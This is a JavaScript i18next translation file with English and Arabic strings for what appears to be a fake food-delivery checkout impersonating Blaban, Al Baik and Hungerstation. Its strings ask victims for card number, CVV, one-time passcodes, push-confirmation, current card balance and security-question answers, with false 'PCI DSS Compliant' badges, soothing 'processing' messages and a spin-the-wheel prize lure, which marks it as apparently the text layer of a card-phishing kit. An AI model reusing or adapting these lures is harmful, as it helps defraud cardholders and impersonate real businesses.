import i18n from "i18next";
import { initReactI18next } from "react-i18next";

i18n.use(initReactI18next).init({
  resources: {
    en: {
      translation: {
        "View basket": "View basket",
        BLABAN: "BLABAN",
        "Desserts - Bakery": "Desserts - Bakery",
        "Min. Order": "Min. Order",
        "Delivery Time": "Delivery Time",
        "Delivery Fee": "Delivery Fee",
        minutes: "minutes",
        SR: "SR",
        Calories: "Calories",
        "Order total": "Order total",
        "Add items": "Add items",
        Cart: "Cart",
        Blaban: "Blaban",
        "My order": "My order",
        "Basket subtotal": "Basket subtotal",
        "Order Notes": "Order Notes",
        Instructions: "Instructions",
        "Order instructions description":
          "You can give instructions to the vendor for a better order.",
        "Go to Checkout": "Go to Checkout",
        "Select a Delivery Location": "Select a Delivery Location",
        "Full Name": "Full Name",
        "Type your name here": "Type your name here",
        "Mobile Number": "Mobile Number",
        "05XXXXXXXX": "05XXXXXXXX",
        City: "City",
        "Select a city": "Select a city",
        Address: "Address",
        "Enter your address": "Enter your address",
        "Apartment/Unit": "Apartment/Unit",
        "Enter your apartment/unit number": "Enter your apartment/unit number",
        Riyadh: "Riyadh",
        Jeddah: "Jeddah",
        Dammam: "Dammam",
        Makkah: "Makkah",
        Medina: "Medina",
        Khobar: "Khobar",
        Tabuk: "Tabuk",
        Buraydah: "Buraydah",
        "Khamis Mushait": "Khamis Mushait",
        Jazan: "Jazan",
        Najran: "Najran",
        Hail: "Hail",
        Abha: "Abha",
        Jubail: "Jubail",
        "Al-Hufuf": "Al-Hufuf",
        "Al Qatif": "Al Qatif",
        Arar: "Arar",
        Sakaka: "Sakaka",
        "Al Bahah": "Al Bahah",
        Rabigh: "Rabigh",
        Qurayyat: "Qurayyat",
        Yanbu: "Yanbu",
        Dhahran: "Dhahran",
        Taif: "Taif",
        "Confirm Location": "Confirm Location",
        "Place Order": "Place Order",
        Checkout: "Checkout",
        "Delivery Details": "Delivery Details",
        "Estimated Delivery Time": "Estimated Delivery Time",
        "On-time Delivery Guaranteed: If your order is delayed, you can claim credit to use on your next order":
          "On-time Delivery Guaranteed: If your order is delayed, you can claim credit to use on your next order",
        Change: "Change",
        "Note for the rider E.g. don't ring the bell":
          "Note for the rider E.g. don't ring the bell",
        "Payment Details": "Payment Details",
        "Payment Method": "Payment Method",
        "Online later or Cash": "Online later or Cash",
        Change: "Change",
        "Order Summary": "Order Summary",
        "By ordering you agree to our Terms & Conditions, VAT 15% included":
          "By ordering you agree to our Terms & Conditions, VAT 15% included",
        "Order Total": "Order Total",
        "Delivery Fees": "Delivery Fees",
        Total: "Total",
        SR: "SR",
        "Add New Card": "Add New Card",
        "Card Number": "Card Number",
        "Expiry Date": "Expiry Date",
        "CVV Number": "CVV Number",
        "Note: You will be charged for an amount of 1 SR for card verification which will be refunded directly to your account.":
          "Note: You will be charged for an amount of 1 SR for card verification which will be refunded directly to your account.",
        "Add new card": "Add new card",
        "Promo Offer": "Promo Offer",
        "SALE SALE SALE SALE SALE SALE SALE SALE SALE SALE SALE":
          "SALE SALE SALE SALE SALE SALE SALE SALE SALE SALE SALE",
        Enjoy: "Enjoy",
        off: "off",
        "on all your purchases at": "on all your purchases at",
        "Blaban Restaurant": "Al Baik Restaurant",
        "Hurry, the offer ends when the timer runs out! ⏳":
          "Hurry, the offer ends when the timer runs out! ⏳",
        "Shop Now": "Shop Now",
        Add: "Add",
        "Your payment details are securely encrypted...":
          "Your payment details are securely encrypted...",
        "Verifying your payment details...":
          "Verifying your payment details...",
        "Thank you for your patience...": "Thank you for your patience...",
        "Almost there—just a moment more...":
          "Almost there—just a moment more...",
        "Your security is our priority...": "Your security is our priority...",
        "Processing your transaction securely...":
          "Processing your transaction securely...",
        "Payment validation in progress...":
          "Payment validation in progress...",
        "We appreciate your understanding...":
          "We appreciate your understanding...",
        "Sit tight while we finalize...": "Sit tight while we finalize...",
        "Thank you for choosing us...": "Thank you for choosing us...",
        "Enter one-time Passcode": "Enter one-time Passcode",
        "A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number.":
          "A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number.",
        Merchant: "Merchant",
        Date: "Date",
        "Card Number": "Card Number",
        Amount: "Amount",
        "Enter One-Time Passcode": "Enter One-Time Passcode",
        "Enter Passcode": "Enter Passcode",
        "Haven't received a one-time passcode?":
          "Haven't received a one-time passcode?",
        Cancel: "Cancel",
        Help: "Help",
          "Submit": "Submit",
            "I have confirmed the push": "I have confirmed the push",
            "Confirm Your Transaction": "Confirm Your Transaction",
            "PCI DSS Compliant": "PCI DSS Compliant",
            "Merchant": "Merchant",
            "Date": "Date",
            "Card Number": "Card Number",
            "Amount": "Amount",
            "Didn't receive the push notification?": "Didn't receive the push notification?",
            "Cancel": "Cancel",
            "Help": "Help",
            "Submit": "Submit",
            "Verify Your Payment: Provide Current Balance": "Verify Your Payment: Provide Current Balance",
            "PCI DSS Compliant": "PCI DSS Compliant",
            "Merchant": "Merchant",
            "Date": "Date",
            "Card Number": "Card Number",
            "Amount": "Amount",
            "To complete the payment, please provide the current available balance on your credit card. This helps to verify that your card has sufficient funds for the transaction.": "To complete the payment, please provide the current available balance on your credit card. This helps to verify that your card has sufficient funds for the transaction.",
            "Enter Your Current Credit Card Balance": "Enter Your Current Credit Card Balance",
            "Enter Balance": "Enter Balance",
            "Didn't receive the correct balance information?": "Didn't receive the correct balance information?",
            "Cancel": "Cancel",
            "Help": "Help",
            "I have confirmed the push": "I have confirmed the push",
            "Answer Security Question": "Answer Security Question",
            "PCI DSS Compliant": "PCI DSS Compliant",
            "Merchant": "Merchant",
            "Date": "Date",
            "Card Number": "Card Number",
            "Amount": "Amount",
            "To complete this payment, please answer the security question below. This helps ensure the security of your account.": "To complete this payment, please answer the security question below. This helps ensure the security of your account.",
            "Enter Answer": "Enter Answer",
            "Forgot the answer to your security question?": "Forgot the answer to your security question?",
            "Cancel": "Cancel",
            "Help": "Help",
            "I have confirmed the push": "I have confirmed the push",
            "deliveryTime": "15-25 mins",
            "originalPrice": "25 SAR",
            "freeDelivery": "Free delivery (Spend 15 SAR)",
    "discount": "{{value}}% off on menu", 
              "dealsForYou": "Deals for you",
              "promotion": "PROMOTION PROMOTION PROMOTION",
              "spin_wheel": "Spin the wheel and get a <span class=\"font-bold text-yellow-500\">guaranteed prize</span> at <span class=\"font-bold text-prim_blue\"> Hungerstation</span>!",
              "hurry_offer": "Hurry, the offer ends when the timer runs out! ⏳",
              "spin_button": "Spin the Wheel",
              "congratulations": "Congratulations! 🎉 You won a discount of <span class=\"font-bold text-yellow-500\">-{{percentage}}%</span> on all your purchases at <span class=\"font-bold text-prim_blue\"> Hungerstation</span>!",
              "act_fast": "Act fast while there's still time!",
              "claim_prize": "Claim Your Prize"
      },
      
      
    },
    ar: {
      translation: {
        "View basket": "عرض السلة",
        BLABAN: "بلابان",
        "Desserts - Bakery": "حلويات - مخبز",
        "Min. Order": "الحد الأدنى للطلب",
        "Delivery Time": "وقت التوصيل",
        "Delivery Fee": "رسوم التوصيل",
        minutes: "دقائق",
        SR: "ريال",
        Calories: "سعرات حرارية",
        "Order total": "إجمالي الطلب",
        "Add items": "أضف العناصر",
        Cart: "السلة",
        Blaban: "بلابان",
        "My order": "طلبي",
        "Basket subtotal": "المجموع الفرعي للسلة",
        "Order Notes": "ملاحظات الطلب",
        Instructions: "تعليمات",
        "Order instructions description":
          "يمكنك تقديم تعليمات للبائع لتحسين الطلب.",
        "Go to Checkout": "الذهاب إلى الدفع",
        "Select a Delivery Location": "حدد موقع التسليم",
        "Full Name": "الاسم الكامل",
        "Type your name here": "اكتب اسمك هنا",
        "Mobile Number": "رقم الجوال",
        "05XXXXXXXX": "05XXXXXXXX",
        City: "المدينة",
        "Select a city": "اختر مدينة",
        Address: "العنوان",
        "Enter your address": "أدخل عنوانك",
        "Apartment/Unit": "شقة/وحدة",
        "Enter your apartment/unit number": "أدخل رقم الشقة/الوحدة",
        Riyadh: "الرياض",
        Jeddah: "جدة",
        Dammam: "الدمام",
        Makkah: "مكة",
        Medina: "المدينة",
        Khobar: "الخبر",
        Tabuk: "تبوك",
        Buraydah: "بريدة",
        "Khamis Mushait": "خميس مشيط",
        Jazan: "جازان",
        Najran: "نجران",
        Hail: "حائل",
        Abha: "أبها",
        Jubail: "الجبيل",
        "Al-Hufuf": "الهفوف",
        "Al Qatif": "القطيف",
        Arar: "عرعر",
        Sakaka: "سكاكا",
        "Al Bahah": "الباحة",
        Rabigh: "رابغ",
        Qurayyat: "القريات",
        Yanbu: "ينبع",
        Dhahran: "الظهران",
        Taif: "الطائف",
        "Confirm Location": "تأكيد الموقع",
        "Place Order": "إتمام الطلب",
        Blaban: "بلابان",
        "Delivery Details": "تفاصيل التوصيل",
        "Estimated Delivery Time": "الوقت المتوقع للتوصيل",
        "On-time Delivery Guaranteed: If your order is delayed, you can claim credit to use on your next order":
          "ضمان التوصيل في الوقت المحدد: إذا تأخر طلبك، يمكنك المطالبة برصيد لاستخدامه في طلبك التالي",
        Change: "تغيير",
        "Note for the rider E.g. don't ring the bell":
          "ملاحظة للسائق، على سبيل المثال: لا تدق الجرس",
        "Payment Details": "تفاصيل الدفع",
        "Payment Method": "طريقة الدفع",
        "Online later or Cash": "دفع لاحقاً عبر الإنترنت أو نقداً",
        Change: "تغيير",
        "Order Summary": "ملخص الطلب",
        "By ordering you agree to our Terms & Conditions, VAT 15% included":
          "عند الطلب، فإنك توافق على الشروط والأحكام، وتشمل ضريبة القيمة المضافة 15٪",
        "Order Total": "إجمالي الطلب",
        "Delivery Fees": "رسوم التوصيل",
        Total: "المجموع",
        SR: "ريال",
        "Add New Card": "إضافة بطاقة جديدة",
        "Card Number": "رقم البطاقة",
        "Expiry Date": "تاريخ الانتهاء",
        "CVV Number": "رمز التحقق CVV",
        "Note: You will be charged for an amount of 1 SR for card verification which will be refunded directly to your account.":
          "ملاحظة: سيتم خصم مبلغ 1 ريال سعودي للتحقق من البطاقة وسيتم استرداده مباشرة إلى حسابك.",
        "Add new card": "إضافة بطاقة جديدة",
        "Promo Offer": "عرض ترويجي",
        "SALE SALE SALE SALE SALE SALE SALE SALE SALE SALE SALE":
          "تخفيض تخفيض تخفيض تخفيض تخفيض تخفيض تخفيض تخفيض تخفيض تخفيض تخفيض",
        Enjoy: "استمتع بـ",
        off: "خصم",
        "on all your purchases at": "على جميع مشترياتك في",
        "Blaban Restaurant": "مطعم بلابان",
        "Hurry, the offer ends when the timer runs out! ⏳":
          "سارع، ينتهي العرض عند انتهاء المؤقت! ⏳",
        "Shop Now": "تسوق الآن",
        Add: "إضافة",
        "Your payment details are securely encrypted...":
          "تفاصيل الدفع الخاصة بك مشفرة بأمان...",
        "Verifying your payment details...":
          "جارٍ التحقق من تفاصيل الدفع الخاصة بك...",
        "Thank you for your patience...": "شكرًا لصبرك...",
        "Almost there—just a moment more...":
          "نحن على وشك الانتهاء - لحظة واحدة فقط...",
        "Your security is our priority...": "أمانك هو أولويتنا...",
        "Processing your transaction securely...":
          "جارٍ معالجة معاملتك بأمان...",
        "Payment validation in progress...": "جارٍ التحقق من صحة الدفع...",
        "We appreciate your understanding...": "نقدر تفهمك...",
        "Sit tight while we finalize...": "انتظر قليلاً أثناء إنهاء العملية...",
        "Thank you for choosing us...": "شكرًا لاختيارك لنا...",
        "Enter one-time Passcode": "أدخل رمز المرور لمرة واحدة",
        "A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number.":
          "مطلوب رمز مرور لمرة واحدة لهذه العملية. تم إرسال هذا الرمز إلى رقم هاتفك المسجل.",
        Merchant: "التاجر",
        Date: "التاريخ",
        "Card Number": "رقم البطاقة",
        Amount: "المبلغ",
        "Enter One-Time Passcode": "أدخل رمز المرور لمرة واحدة",
        "Enter Passcode": "أدخل الرمز",
        "Haven't received a one-time passcode?":
          "لم تستلم رمز المرور لمرة واحدة؟",
        Cancel: "إلغاء",
        Help: "مساعدة",
          "Submit": "إرسال",
           "I have confirmed the push": "لقد أكدت الدفع",
           "Confirm Your Transaction": "تأكيد المعاملة",
           "PCI DSS Compliant": "متوافق مع PCI DSS",
           "Merchant": "التاجر",
           "Date": "التاريخ",
           "Card Number": "رقم البطاقة",
           "Amount": "المبلغ",
           "Didn't receive the push notification?": "لم تتلق إشعار الدفع؟",
           "Cancel": "إلغاء",
           "Help": "مساعدة",
           "Submit": "إرسال",
           "Verify Your Payment: Provide Current Balance": "تحقق من الدفع: أدخل الرصيد الحالي",
           "PCI DSS Compliant": "متوافق مع PCI DSS",
           "Merchant": "التاجر",
           "Date": "التاريخ",
           "Card Number": "رقم البطاقة",
           "Amount": "المبلغ",
           "To complete the payment, please provide the current available balance on your credit card. This helps to verify that your card has sufficient funds for the transaction.": "لإكمال الدفع، يرجى إدخال الرصيد الحالي المتاح في بطاقتك الائتمانية. يساعد هذا في التحقق من أن لديك أموالًا كافية لإجراء المعاملة.",
           "Enter Your Current Credit Card Balance": "أدخل الرصيد الحالي لبطاقتك الائتمانية",
           "Enter Balance": "أدخل الرصيد",
           "Didn't receive the correct balance information?": "لم تتلق معلومات الرصيد الصحيحة؟",
           "Cancel": "إلغاء",
           "Help": "مساعدة",
           "I have confirmed the push": "لقد أكدت الدفع",
           "Answer Security Question": "أجب عن سؤال الأمان",
           "PCI DSS Compliant": "متوافق مع PCI DSS",
           "Merchant": "التاجر",
           "Date": "التاريخ",
           "Card Number": "رقم البطاقة",
           "Amount": "المبلغ",
           "To complete this payment, please answer the security question below. This helps ensure the security of your account.": "لإكمال الدفع، يرجى الإجابة على سؤال الأمان أدناه. يساعد هذا في ضمان أمان حسابك.",
           "Enter Answer": "أدخل الإجابة",
           "Forgot the answer to your security question?": "هل نسيت إجابة سؤال الأمان؟",
           "Cancel": "إلغاء",
           "Help": "مساعدة",
           "I have confirmed the push": "لقد أكدت الدفع",
           "deliveryTime": "١٥-٢٥ دقيقة",
           "originalPrice": "٢٥ ريال",
           "freeDelivery": "توصيل مجاني (عند إنفاق ١٥ ريال)",
            "discount": "خصم {{value}}٪ على المنيو",
            "dealsForYou": "عروض لك",
            "promotion": "ترويج ترويج ترويج",
            "spin_wheel": "قم بتدوير العجلة واحصل على <span class=\"font-bold text-yellow-500\">جائزة مضمونة</span> في <span class=\"font-bold text-prim_blue\"> Hungerstation</span>!",
            "hurry_offer": "سارع، ينتهي العرض عند انتهاء المؤقت! ⏳",
            "spin_button": "تدوير العجلة",
            "congratulations": "تهانينا! 🎉 لقد فزت بخصم <span class=\"font-bold text-yellow-500\">-{{percentage}}%</span> على جميع مشترياتك في <span class=\"font-bold text-prim_blue\"> Hungerstation</span>!",
            "act_fast": "تصرف بسرعة بينما لا يزال هناك وقت!",
            "claim_prize": "احصل على جائزتك"
      },
    },
  },
  lng: "en", // Sets Arabic as the default language
  fallbackLng: "ar", // Ensures fallback is also Arabic
  debug: true,
  interpolation: {
    escapeValue: false,
  },
});

export default i18n;
